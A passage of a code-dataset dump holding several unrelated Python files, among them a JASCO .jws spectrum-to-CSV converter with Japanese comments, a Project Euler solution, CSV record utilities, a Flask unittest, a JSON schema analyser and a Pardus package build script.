'P-1']\r\n\r\n#S偏光、P偏光データの共通ファイル名が等しいファイルを抽出\r\nfilelist_s_p = set(filelist_jws_s_ext) & set(filelist_jws_p_ext)\r\n\r\n# データを格納するフォルダを作成する\r\nif os.path.exists(\"data\") == False:\r\n    try:\r\n        os.mkdir(\"data\")\r\n        print(\"dataフォルダを作成しました\")\r\n    except:\r\n        print(\"dataフォルダの作成に失敗しました\")\r\nelse:\r\n        print(\"dataフォルダはすでに存在しています\")\r\n        \r\n# データを格納するフォルダを作成する\r\nif os.path.exists(\"data-SP\") == False:\r\n    try:\r\n        os.mkdir(\"data-SP\")\r\n        print(\"data-SPフォルダを作成しました\")\r\n    except:\r\n        print(\"data-SPフォルダの作成に失敗しました\")\r\nelse:\r\n        print(\"data-SPフォルダはすでに存在しています\")\r\n\r\n\r\nwavelength_csv = numpy.arange(x_for_last_point, x_for_first_point - x_step, -x_step)\r\nwavelength_csv = numpy.array(wavelength_csv, ndmin=2)\r\n\r\nheader_allcsv = ['wavelength']\r\nheader_allcsv_s_p = ['wavelength']\r\nbody_allcsv = wavelength_csv.T\r\nbody_allcsv_s_p = wavelength_csv.T\r\n\r\nsleep(0.3)\r\nprint('変換を開始します')\r\nsleep(0.3)\r\n\r\n# 各ファイルごとに処理をする\r\nfor filename in filelist_jws:\r\n\r\n    with open(filename + \".jws\", \"rb\") as f:\r\n        # xの開始、終端、ステップをヘッダーから取得する。\r\n        print(\"filename: \" , filename)\r\n\r\n        # intensityデータを取得する\r\n        # バイナリデータにおいてデータが始まるアドレスが0xC80、0xE00の2パターンありそう\r\n        #0xC80から始まる場合は、0xB80 から4D 00 6F 00 64 00 75 のバイナリデータ\r\n        #0xE00から始まる場合は、0xD80 から4D 00 6F 00 64 00 75 のバイナリデータ\r\n        #上記をもとに条件分岐する\r\n        \r\n        \r\n        data = \"\"\r\n\r\n\r\n        is_datainfo_A00 = False\r\n        \r\n        is_blank_C00 = False\r\n        is_blank_C40 = False\r\n        is_blank_C80 = False\r\n        \r\n        \r\n        is_data_C00 = False\r\n        is_data_C40 = False\r\n        is_data_C80 = False\r\n        \r\n        \r\n        is_datainfo_C00 = False\r\n        is_AC0 = False\r\n        \r\n        x_A00 = \"\"\r\n        x_AC0 = \"\"\r\n\r\n        x_C00 = \"\"\r\n        x_C01 = \"\"\r\n        x_C02 = \"\"\r\n        x_C03 = \"\"\r\n        x_C04 = \"\"\r\n        x_C05 = \"\"\r\n        x_C06 = \"\"\r\n\r\n        x_C40 = \"\"\r\n        x_C41 = \"\"\r\n        x_C42 = \"\"\r\n        x_C43 = \"\"\r\n        x_C44 = \"\"\r\n        x_C45 = \"\"\r\n        x_C46 = \"\"\r\n\r\n        x_C80 = \"\"\r\n        x_C81 = \"\"\r\n        x_C82 = \"\"\r\n        x_C83 = \"\"\r\n        x_C84 = \"\"\r\n        x_C85 = \"\"\r\n        x_C86 = \"\"\r\n\r\n\r\n\r\n\r\n        f.seek(0xA00)\r\n        x_A00 = f.read(8)\r\n        #print('x_A00')\r\n        #print(x_A00)\r\n        if x_A00 == b'D\\x00a\\x00t\\x00a\\x00':\r\n            #print('x_A00')\r\n            #print(x_A00)\r\n            is_datainfo_A00 = True\r\n            #print('datainfo start at A00')\r\n\r\n\r\n        f.seek(0xC00)\r\n        x_C00 = f.read(1)\r\n        f.seek(0xC01)\r\n        x_C01 = f.read(1)\r\n        f.seek(0xC02)\r\n        x_C02 = f.read(1)\r\n        f.seek(0xC03)\r\n        x_C03 = f.read(1)\r\n        f.seek(0xC04)\r\n        x_C04 = f.read(1)\r\n        f.seek(0xC05)\r\n        x_C05 = f.read(1)\r\n        f.seek(0xC06)\r\n        x_C06 = f.read(1)\r\n\r\n\r\n        if  1*(x_C00 == b'\\x00') +\\\r\n            1*(x_C01 == b'\\x00') +\\\r\n            1*(x_C02 == b'\\x00') +\\\r\n            1*(x_C03 == b'\\x00') +\\\r\n            1*(x_C04 == b'\\x00') +\\\r\n            1*(x_C05 == b'\\x00') +\\\r\n            1*(x_C06 == b'\\x00') >= 3:\r\n\r\n            is_blank_C00 = True\r\n            #print('C00 is blank')\r\n        else :\r\n            pass\r\n            
#print('C00 is not blank')\r\n\r\n        # check the C40 - C45\r\n        f.seek(0xC40)\r\n        x_C40 = f.read(1)\r\n        f.seek(0xC41)\r\n        x_C41 = f.read(1)\r\n        f.seek(0xC42)\r\n        x_C42 = f.read(1)\r\n        f.seek(0xC43)\r\n        x_C43 = f.read(1)\r\n        f.seek(0xC44)\r\n        x_C44 = f.read(1)\r\n        f.seek(0xC45)\r\n        x_C45 = f.read(1)\r\n        f.seek(0xC46)\r\n        x_C46 = f.read(1)\r\n\r\n        if  1*(x_C40 == b'\\x00') +\\\r\n            1*(x_C41 == b'\\x00') +\\\r\n            1*(x_C42 == b'\\x00') +\\\r\n            1*(x_C43 == b'\\x00') +\\\r\n            1*(x_C44 == b'\\x00') +\\\r\n            1*(x_C45 == b'\\x00') +\\\r\n            1*(x_C46 == b'\\x00') >= 3:\r\n\r\n            is_blank_C40 = True\r\n            #print('C00 is blank')\r\n        else :\r\n            pass\r\n            #print('C00 is not blank')    \r\n\r\n        # check the C80 - C85\r\n        f.seek(0xC80)\r\n        x_C80 = f.read(1)\r\n        f.seek(0xC81)\r\n        x_C81 = f.read(1)\r\n        f.seek(0xC82)\r\n        x_C82 = f.read(1)\r\n        f.seek(0xC83)\r\n        x_C83 = f.read(1)\r\n        f.seek(0xC84)\r\n        x_C84 = f.read(1)\r\n        f.seek(0xC85)\r\n        x_C85 = f.read(1)\r\n        f.seek(0xC86)\r\n        x_C86 = f.read(1)\r\n\r\n\r\n        if  1*(x_C80 == b'\\x00') +\\\r\n            1*(x_C81 == b'\\x00') +\\\r\n            1*(x_C82 == b'\\x00') +\\\r\n            1*(x_C83 == b'\\x00') +\\\r\n            1*(x_C84 == b'\\x00') +\\\r\n            1*(x_C85 == b'\\x00') +\\\r\n            1*(x_C86 == b'\\x00') >= 3:\r\n\r\n            is_blank_C80 = True\r\n            #print('C00 is blank')\r\n        else :\r\n            pass\r\n            #print('C00 is not blank')  \r\n\r\n        #print(is_blank_C00)\r\n        #print(is_blank_C40)\r\n        #print(is_blank_C80)\r\n\r\n\r\n\r\n        if is_datainfo_A00 == True and is_blank_C00 == False:\r\n            is_data_C00 = True\r\n            #print('C00からデータあり')\r\n        \r\n        elif is_datainfo_A00 == True and  is_blank_C00 == True and is_blank_C40 == False :\r\n            is_data_C40 = True\r\n            #print('C40からデータあり')\r\n        \r\n        elif is_datainfo_A00 == True and is_blank_C00 == True and is_blank_C40 == True and is_blank_C80 == False:\r\n            is_data_C80 = True\r\n            #print('C80からデータあり')\r\n        \r\n        else:\r\n            pass\r\n            #print('想定の範囲外です')\r\n\r\n\r\n\r\n\r\n        f.seek(0xC00)\r\n        x_C00 = f.read(8)\r\n        #print(x_C00)\r\n        if x_C00 == b'D\\x00a\\x00t\\x00a\\x00':\r\n            is_datainfo_C00 = True\r\n            #print('datainfo start at C00')\r\n\r\n        if  is_data_C00 == True:\r\n            #print('from 0xC00, not seperate')\r\n            f.seek(0xC00)\r\n            x = f.read(int(x_point_number * 4))\r\n            data = x\r\n\r\n        elif is_data_C40 == True:\r\n            #print('from 0xC40, not seperate')\r\n            f.seek(0xC40)\r\n            x = f.read(int(x_point_number * 4))\r\n            data = x\r\n  \r\n        elif is_data_C80 == True:\r\n            #print('from 0xC80, not seperate')\r\n            f.seek(0xC80)\r\n            x = f.read(int(x_point_number * 4))\r\n            data = x\r\n        \r\n        elif is_datainfo_A00 == True :\r\n            pass\r\n            \r\n\r\n        if is_datainfo_C00 == True :\r\n            #DataInfoの前のバイト数が256の場合と320の場合がある。\r\n            #無理やり場合分け\r\n            \r\n            #320の場合は\r\n            
is_AC0 = False\r\n            f.seek(0xAC0)\r\n            x_AC0 = f.read(4)\r\n            \r\n            #print('x_AC0')\r\n            #print(x_AC0)\r\n            \r\n            if x_AC0 != b'\\x00\\x00\\x00\\x00' :\r\n                #x_AC0が0ではない\r\n                #AC0からデータが始まっている場合\r\n                #print('x_AC0')\r\n                \r\n                #print(x_AC0)\r\n                is_AC0 = True\r\n            else:\r\n                is_AC0 = False\r\n                \r\n            #print('is_AC0')\r\n            \r\n            #print(is_AC0)\r\n\r\n            if is_AC0 == True:\r\n                #print('1st data series from 0xAC0 2nd data series from E00')\r\n\r\n                f.seek(0xAC0)\r\n                x = f.read(320)\r\n\r\n                f.seek(0xE00)\r\n                y = f.read(int(x_point_number * 4)- 320)\r\n\r\n            \r\n            elif is_AC0 == False:\r\n                #print('1st data series from 0xB00 2nd data series from E00')\r\n            \r\n                f.seek(0xB00)\r\n                x = f.read(256)\r\n\r\n                f.seek(0xE00)\r\n                y = f.read(int(x_point_number * 4)- 256)\r\n\r\n            data = x + y\r\n                \r\n        #print('is_datainfo_A00', is_datainfo_A00)\r\n        #print('is_blank_C00', is_blank_C00)\r\n        #print('is_blank_C40', is_blank_C40)\r\n        #print('is_blank_C80', is_blank_C80)\r\n        #print('is_datainfo_C00', is_datainfo_C00)\r\n        #print('is_AC0', is_AC0)\r\n        #print('data')\r\n        #print(data)\r\n\r\n        spectra_csv = numpy.array(struct.unpack(\"{0}f\".format(int(x_point_number)), data))\r\n        spectra_csv = numpy.array(spectra_csv,ndmin=2)\r\n        body_csv = numpy.hstack((wavelength_csv.T,spectra_csv.T))\r\n        \r\n        header_csv = ['wavelength',filename]\r\n    \r\n        #for all data csv\r\n        header_allcsv.append(filename)\r\n        body_allcsv = numpy.hstack([body_allcsv,spectra_csv.T])\r\n        \r\n    # データをcsvに書きだす。\r\n    with open(\"data/\" + filename + \".csv\", \"w\", newline='') as expoted_data_obj:\r\n        writer_csv = csv.writer(expoted_data_obj)\r\n        writer_csv.writerow(header_csv)\r\n        writer_csv.writerows(body_csv)\r\n        \r\nif is_synthesizing == True:\r\n    for filename in filelist_s_p:\r\n        spectra_s = []\r\n        spectra_p = []\r\n        \r\n\r\n        with open('data/' + filename + \"s-1.csv\", \"r\") as f_s:\r\n            reader_s = csv.reader(f_s)\r\n            header_s = next(reader_s)\r\n            \r\n            for row_s in reader_s:\r\n                row_s_fl = [float(n) for n in row_s]\r\n                spectra_s.append(row_s_fl)\r\n            \r\n            spectra_s = np.array(spectra_s)\r\n            spectra_s = spectra_s[:,1]\r\n            #print(spectra_s)\r\n\r\n        with open('data/' + filename + \"p-1.csv\", \"r\") as f_p:\r\n            reader_p = csv.reader(f_p)\r\n            header_p = next(reader_p)\r\n            \r\n            for row_p in reader_p:\r\n                row_p_fl = [float(n) for n in row_p]\r\n                spectra_p.append(row_p_fl)\r\n\r\n            spectra_p = np.array(spectra_p)\r\n            spectra_p = spectra_p[:,1]            \r\n            #print(spectra_p)\r\n\r\n\r\n        spectra_s = numpy.array(spectra_s)\r\n        spectra_p = numpy.array(spectra_p)\r\n\r\n        #print(spectra_s)\r\n        #print(spectra_p)\r\n\r\n        spectra_csv_s_p = (spectra_s + spectra_p ) * 0.5\r\n        \r\n        
wavelength_csv = np.array(wavelength_csv)\r\n\r\n        spectra_csv_s_p = np.array(spectra_csv_s_p)\r\n        spectra_csv_s_p = spectra_csv_s_p.reshape(441,1)\r\n\r\n        body_csv_s_p = numpy.hstack((wavelength_csv.T, spectra_csv_s_p))\r\n        header_csv_s_p = ['wavelength', filename + 's_p']\r\n        print(\"filename: \" , filename + \"SP\")\r\n        \r\n        # データをcsvに書きだす。\r\n        with open(\"data-SP/\" + filename + \"SP.csv\", \"w\", newline='') as expoted_data_obj_s_p:\r\n            writer_csv = csv.writer(expoted_data_obj_s_p)\r\n            writer_csv.writerow(header_csv_s_p)\r\n            writer_csv.writerows(body_csv_s_p)\r\n    \r\n        #for all data csv\r\n        header_allcsv_s_p.append(filename + 's_p')\r\n        body_allcsv_s_p = numpy.hstack([body_allcsv_s_p,spectra_csv_s_p])\r\n\r\n\r\nwith open('all.csv', 'w', newline='') as exported_alldata_obj:\r\n    writer_allcsv = csv.writer(exported_alldata_obj)\r\n    writer_allcsv.writerow(header_allcsv)\r\n    writer_allcsv.writerows(body_allcsv)\r\n\r\nif is_synthesizing == True:\r\n    with open( 'all_s_p.csv', 'w', newline='') as exported_alldata_obj_s_p:\r\n        writer_allcsv_s_p = csv.writer(exported_alldata_obj_s_p)\r\n        writer_allcsv_s_p.writerow(header_allcsv_s_p)\r\n        writer_allcsv_s_p.writerows(body_allcsv_s_p)\r\n\r\nprint('csvファイルへの変換を完了しました。')\r\nsleep(1)","sub_path":"convertjws_20190305.py","file_name":"convertjws_20190305.py","file_ext":"py","file_size_in_byte":15924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"488071581","text":"# import the necessary packages\nfrom shapedetector import ShapeDetector\nimport argparse\nimport imutils\nimport numpy as np\nimport cv2\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required=True,\n\thelp=\"path to the input image\")\nargs = vars(ap.parse_args())\n\n# load the image and resize it to a smaller factor so that\n# the shapes can be approximated better\nimage = cv2.imread(args[\"image\"])\nresized = imutils.resize(image, width=1200)\nratio = image.shape[0] / float(resized.shape[0])\n\ncrop = resized[1240+426,896+275]\ncv2.imshow(\"crop\",crop)\ncv2.waitKey(11000)\ncv2.destroyAllWindows()\ncv2.waitKey(1)\n","sub_path":"crop1.py","file_name":"crop1.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"89014733","text":"'''\nProblem 62\n\nThe cube, 41063625 (3453), can be permuted to produce two other cubes: 56623104 (3843) and 66430125 (4053). In fact, 41063625 is the smallest cube which has exactly three permutations of its digits which are also cube.\n\nFind the smallest cube for which exactly five permutations of its digits are cube.\n'''\n\nimport time\n\ndef split_digits(n):\n\tdef split(n, arr):\n\t\tif n == 0:\n\t\t\treturn sorted(arr[::-1])\n\t\telse:\n\t\t\treturn split(n//10, arr + [n%10])\n\treturn tuple(split(n, []))\n\ndef cubic_permutations():\n\ti, cubic_map = 22, {}\n\twhile True:\n\t\tcubed_val = i**3\n\t\tsplit_num = split_digits(cubed_val)\n\t\tif split_num in cubic_map:\n\t\t\tcubic_map[split_num] += [cubed_val]\n\t\telse:\n\t\t\tcubic_map[split_num] = [cubed_val]\n\n\t\tif len(cubic_map[split_num]) == 5:\n\t\t\treturn cubic_map[split_num][0]\n\n\t\ti = i + 1\n\nif __name__ == '__main__':\n\n\tstart = time.time()\n\tprint(cubic_permutations())\n\tend = time.time()\n\n\tprint(\"Execution time: %fs\" %(end - start))\n","sub_path":"solutions/cubic_permutations.py","file_name":"cubic_permutations.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"313980600","text":"# -*- coding: utf-8 -*\n\nimport time\nimport datetime\nfrom datetime import datetime as dt, date, time as tm\n\nclass Tools:\n\tdef __init__(self, errors):\n\t\tself.errors = errors\n\t\n\tdef explode(self, line, sep=','):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tstr_array = line.split(sep)\n\n\t\treturn str_array\n\t\n\tdef implode(self, str_array, sep=','):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tline = sep.join(str_array)\n\t\t\n\t\treturn line\n\t\t\n\tdef line2rec(self, line, cols, sep=','):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\trec = {}\n\t\tstr_array = self.explode(line, sep)\n\t\tlength = min(len(str_array), len(cols))\n\t\tfor cnt in range(length):\n\t\t\trec[cols[cnt]] = str_array[cnt]\n\n\t\treturn rec\n\t\t\n\tdef rec2line(self, rec, cols, sep=','):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tstr_array = []\n\t\tfor col in cols:\n\t\t\tif rec.get(col) != None:\n\t\t\t\tstr_array.append(rec[col])\n\t\t\n\t\tline = self.implode(str_array, sep)\n\t\t\n\t\treturn line\n\t\t\n\tdef str2type(self, value, value_type, sep=','):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tif value_type == 'str':\n\t\t\treturn value\n\t\t\n\t\telif value_type == 'int':\n\t\t\treturn int(value)\n\t\t\n\t\telif value_type == 'num' or value_type == 'float':\n\t\t\treturn float(value)\n\t\t\n\t\telif value_type == 'bool':\n\t\t\tif value == '1':\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\t\t\t\n\t\telif value_type == 'yyyymmdd':\n\t\t\treturn dt.strptime(value, '%Y%m%d') #.date()\n\t\t\t\n\t\telif value_type == 'hhmmss':\n\t\t\treturn dt.strptime(value, '%H%M%S') #.time()\n\t\t\t\n\t\telif value_type == 'str_array':\n\t\t\treturn self.explode(value, sep)\n\t\t\n\t\telif value_type == 'int_array':\n\t\t\tint_array = []\n\t\t\tstr_array = self.explode(value, sep)\n\t\t\tfor s in str_array:\n\t\t\t\tint_array.append(int(s))\n\t\t\treturn int_array\n\t\t\n\t\telif value_type == 'num_array' or value_type == 'float_array':\n\t\t\tfloat_array = []\n\t\t\tstr_array = self.explode(value, sep)\n\t\t\tfor s in str_array:\n\t\t\t\tfloat_array.append(float(s))\n\t\t\treturn float_array\n\t\t\n\t\telif value_type == 'bool_array':\n\t\t\tbool_array = []\n\t\t\tstr_array = self.explode(value, sep)\n\t\t\tfor s in str_array:\n\t\t\t\tif value == '1':\n\t\t\t\t\tbool_array.append(True)\n\t\t\t\telse:\n\t\t\t\t\tbool_array.append(False)\n\t\t\treturn bool_array\n\t\t\n\t\telif value_type == 'escape':\n\t\t\treturn  self.escape_sequence(value)\n\t\t\t\n\t\telse:\n\t\t\tself.errors.raise_error('Unknown type ' + value_type)\n\t\t\treturn value\n\t\n\tdef type2str(self, value, value_format):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tif value == None:\n\t\t\treturn ''\n\t\t\n\t\tif value_format == '%Y%m%d':\n\t\t\treturn dt.strftime(value, '%Y%m%d')\n\t\t\t\n\t\telif value_format == '%H%M%S':\n\t\t\treturn dt.strftime(value, '%H%M%S')\n\t\t\t\n\t\telse:\n\t\t\treturn value_format.format(value)\n\t\n\tdef shape_column_types(self, columns, file_column_types):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\t\n\t\tcolumn_types = {}\n\t\tfor col in columns:\n\t\t\tif file_column_types.get(col) != None:\n\t\t\t\tcolumn_types[col] = file_column_types[col]\n\t\t\telse:\n\t\t\t\t# self.errors.raise_error('Unknown column ' + col + ' for type detecting')\n\t\t\t\t# break\n\t\t\t\tcolumn_types[col] = 'num'\n\t\t\t\t\n\t\treturn 
column_types\n\t\t\n\tdef shape_column_formats(self, columns, all_column_formats):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\t\n\t\tcolumn_formats = {}\n\t\tfor col in columns:\n\t\t\tif all_column_formats.get(col) != None:\n\t\t\t\tcolumn_formats[col] = all_column_formats[col]\n\t\t\telse:\n\t\t\t\t# self.errors.raise_error('Unknown column ' + col + ' for format detecting')\n\t\t\t\t# break\n\t\t\t\tcolumn_formats[col] = '{:.2f}'\n\t\t\n\t\treturn column_formats\n\t\n\tdef type_rec(self, rec, column_types):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tfor col in rec:\n\t\t\trec[col] = self.str2type(rec[col], column_types[col])\n\t\t\t\n\tdef str_rec(self, rec, column_formats):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tfor col in rec:\n\t\t\trec[col] = self.type2str(rec[col], column_formats[col])\n\t\n\tdef add_rec_to_table(self, rec, table):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tfor col in table:\n\t\t\tif rec.get(col) != None:\n\t\t\t\ttable[col].append(rec[col])\n\t\t\telse:\n\t\t\t\ttable[col].append(None)\n\t\n\tdef get_rec_from_table(self, rec_cnt, table):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\trec = {}\n\t\tfor col in table:\n\t\t\trec[col] = table[col][rec_cnt]\n\t\t\n\t\treturn rec\n\t\t\n\tdef add_columns(self, adv_columns, table, columns):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tfor adv_col in adv_columns:\n\t\t\tcolumns.append(adv_col)\n\t\t\ttable[adv_col] = []\n\t\t\tlength = len(table[columns[0]])\n\t\t\tfor i in range(length):\n\t\t\t\ttable[adv_col].append(None)\n\t\t\n\tdef update_cells(self, cell_columns, cell_values, rec_cnt, table):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tlength = min(len(cell_columns), len(cell_values))\n\t\tfor cnt in range(length):\n\t\t\tif table.get(cell_columns[cnt]) != None:\n\t\t\t\ttable[cell_columns[cnt]][rec_cnt] = cell_values[cnt]\n\t\t\t\t\n\tdef escape_sequence(self, seq):\n\t\tif seq == \"'\\\\t'\":\n\t\t\tseq = seq.replace(\"'\\\\t'\", '\\t')\n\t\telif seq == \"','\":\n\t\t\tseq = seq.replace(\"','\", ',')\n\t\telif seq == \"'.'\":\n\t\t\tseq = seq.replace(\"','\", ',')\n\t\telif seq == \"';'\": \n\t\t\tseq = seq.replace(\"';'\", ';')\n\t\telif seq == \"''\":\n\t\t\tseq = seq.replace(\"''\", '')\n\t\telse:\n\t\t\tself.errors.raise_error('Unknown escape sequence ' + seq)\n\t\treturn seq\n\t\t\n\t\t\n","sub_path":"scripts/modules/common/Tools.py","file_name":"Tools.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"476240557","text":"import DB_connection_app\nimport unittest\nimport json\nfrom werkzeug.http import parse_cookie\n\nclass DB_connection_appTestCase(unittest.TestCase):\n    def setUp(self):\n        DB_connection_app.app.config['TESTING'] = True\n        self.app = DB_connection_app.app.test_client()\n\n\n    def test_index(self):\n        \"\"\" Ensures that flask was set up correctly \"\"\"\n        tester = DB_connection_app.app.test_client(self)\n        response = tester.get('/', content_type='html/text')\n        self.assertEqual(response.status_code, 200)\n\n    # assert functions\n    def test_content(self):\n        \"\"\"Ensure HTML file being rendered has the right contents \"\"\"\n        rv = self.app.get('/')\n        assert b'Find My location' in rv.data\n        assert b'Find Closest Stations' in rv.data\n        assert b'Availability' in rv.data\n\n    def test_dummy(self):\n        \"\"\" Ensures that JSON file from database is being read properly \"\"\"\n        response = self.app.get(\"/station/static\")\n        data = json.loads(response.get_data(as_text=True))\n\n        self.assertEqual(data[0]['address'], \"Chatham Street\")\n\n\nif __name__ == '__main__':\n    unittest.main()","sub_path":"DB_connection_app_tests.py","file_name":"DB_connection_app_tests.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"58430628","text":"import typing as t\nimport warnings\n\nNoneType = None.__class__\n\nT = t.TypeVar('T')\n\n\nclass AutoJsonMeta(type):\n    def __new__(mcs, name, bases, ns: dict):\n        if ns.get('_root', False):\n            return super().__new__(mcs, name, bases, ns)\n        bases = tuple(filter(lambda it: AutoJson is not it, bases))\n\n        ret = type(name, (*bases, Json), ns)\n        SchemaMonitor.register(ret)\n\n        annotations = ns.get('__annotations__', [])\n\n        def __init__(self, **kwargs):\n            if not kwargs:\n                return\n            for each in annotations:\n\n                setattr(self, each, kwargs[each])\n\n        template_format = f'{ret.__name__}({{}})'.format\n\n        def __repr__(self):\n            return template_format(', '.join(\n                f'{each}={getattr(self, each)!r}' for each in annotations))\n\n        ret.__init__ = __init__\n        ret.__repr__ = __repr__\n        return ret\n\n\nclass Json:\n    pass\n\n\nclass AutoJson(metaclass=AutoJsonMeta):\n    _root = True\n\n    def __init__(self, *args, **kwargs):\n        raise TypeError\n\n    def to_dict(self) -> dict:\n        raise TypeError\n\n    def to_bson(self) -> bytes:\n        raise TypeError\n\n    def to_json(self) -> bytes:\n        raise TypeError\n\n    @classmethod\n    def from_dict(cls: t.Type[T], data: dict) -> T:\n        raise TypeError\n\n\nclass Spec:\n    pass\n\n\nclass Named(Spec, t.NamedTuple):\n    typ: type\n\n\nclass ForwardRef(Spec, t.NamedTuple):\n    \"\"\"\n    to resolve cross references\n    class S:\n        a: A\n        s: S\n    \n    class A:\n        i: int\n    \"\"\"\n    name: str\n\n\nclass Concrete(Spec, t.NamedTuple):\n    \"\"\"\n    str, int, float, null\n    \"\"\"\n    typ: type\n\n\nNoneConcrete = Concrete(NoneType)\n\n\nclass Optional(Spec, t.NamedTuple):\n    typ: Spec\n\n\nclass Union(Spec, t.NamedTuple):\n    args: t.List[Spec]\n\n\nclass List(Spec, t.NamedTuple):\n    elem: Spec\n\n\nclass Dict(Spec, t.NamedTuple):\n    key: Spec\n    value: Spec\n\n\nclass SchemaMonitor:\n    # schemas: qualname -> (type, [(field_name, field_type_spec)])\n    schemas: t.Dict[str, t.Tuple[type, t.List[t.Tuple[str, Spec]]]] = {}\n    # methods: qualname -> (from_dict, to_dict, query)\n    methods: t.Dict[str, t.List[t.Callable]]\n\n    def __init__(self):\n        raise TypeError(\"Monitor is a singleton.\")\n\n    @classmethod\n    def remove(cls, typ: t.Union[str, type]):\n\n        subscript = typ\n        if isinstance(subscript, type):\n            subscript = subscript.__qualname__\n\n        del cls.schemas[subscript]\n\n    @classmethod\n    def register(cls, typ: type):\n        \"\"\"\n        :param typ: must be checked to contains __annotations__\n        :return:\n        \"\"\"\n        qualname = typ.__qualname__\n        if qualname in cls.schemas:\n            warnings.warn(f\"Overwriting json type schema {qualname!r}.\")\n\n        cls.schemas[typ.__qualname__] = typ, [\n            (k, describe(t)) for k, t in typ.__annotations__.items()\n        ]\n\n    @classmethod\n    def resolve(cls, strict=False):\n        for _, (ty, fields) in cls.schemas.items():\n            for i in range(len(fields)):\n                attr, field = fields[i]\n                fields[i] = attr, backref(field, strict=strict)\n\n\ndef backref(spec: Spec, strict) -> Spec:\n    def _backref(_):\n        return backref(_, strict)\n\n    if isinstance(spec, (Optional, Concrete, Named)):\n        return spec\n\n    if 
isinstance(spec, ForwardRef):\n        type_and_fields = SchemaMonitor.schemas.get(spec.name)\n        if type_and_fields:\n            return Named(type_and_fields[0])\n        if not strict:\n            return spec\n        raise TypeError(f'forward ref: {spec}.')\n\n    if isinstance(spec, List):\n        return List(_backref(spec.elem))\n\n    if isinstance(spec, Dict):\n        key = _backref(spec.key)\n        value = _backref(spec.value)\n        return Dict(key, value)\n\n    if isinstance(spec, Union):\n\n        return Union(list(map(_backref, spec.args)))\n\n    raise TypeError(spec)\n\n\ndef describe(ty: t.Union[str, t.Type]) -> Spec:\n    if isinstance(ty, str):\n        return ForwardRef(ty)\n\n    if ty in (int, float, str, NoneType):\n        return Concrete(ty)\n\n    if hasattr(ty, '__origin__'):\n        args: list = []\n\n        def is_origin(typ):\n            return ty.__origin__ is typ and (args.extend(\n                getattr(ty, '__args__')) or True)\n\n        if is_origin(t.List):\n            e_ty, = args\n            return List(describe(e_ty))\n        elif is_origin(t.Union):\n            args = list(map(describe, args))\n\n            if len(args) == 2 and NoneConcrete in args:\n                # pick the non-None member: index 1 when args[0] is the None spec, else index 0\n                e_ty = args[args[0] == NoneConcrete]\n                return Optional(e_ty)\n            return Union(args)\n        elif is_origin(t.Dict):\n            key, value = map(describe, args)\n            return Dict(key, value)\n    if hasattr(ty, '__forward_arg__'):\n        return describe(getattr(ty, '__forward_arg__'))\n\n    assert issubclass(\n        ty, Json), TypeError(f\"expected Json type, got {ty.__qualname__!r}.\")\n\n    return Named(ty)\n","sub_path":"auto_json/schema_analyse.py","file_name":"schema_analyse.py","file_ext":"py","file_size_in_byte":4986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"3851434","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2007 TUBITAK/UEKAE\n# Licensed under the GNU General Public License, version 2.\n# See the file http://www.gnu.org/copyleft/gpl.txt.\n\nfrom pisi.actionsapi import pisitools\nfrom pisi.actionsapi import shelltools\nfrom pisi.actionsapi import get\n\n\ndefinitions = \"CFLAGS= \\\n               STD_INCLUDE=%s/usr/share/yodl \\\n               MAN_DIR=%s/usr/share/man \\\n               DOC_DIR=%s/usr/share/doc/yodl-%s-%s \\\n               YODL_BIN=%s/usr/bin \\\n               STD_CONVERSIONS=man\" % (get.installDIR(),get.installDIR(),get.installDIR(),get.srcVERSION(),get.srcRELEASE(),get.installDIR())\n\ndef setup():\n    pisitools.chmod(\"contrib/build.pl\")\n\ndef build():\n    shelltools.system(\"%s contrib/build.pl make\" % definitions)\n\ndef install():\n    shelltools.system(\"%s contrib/build.pl install\" % definitions)\n\n","sub_path":"pardus/tags/2007-EOL/applications/doc/yodl/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
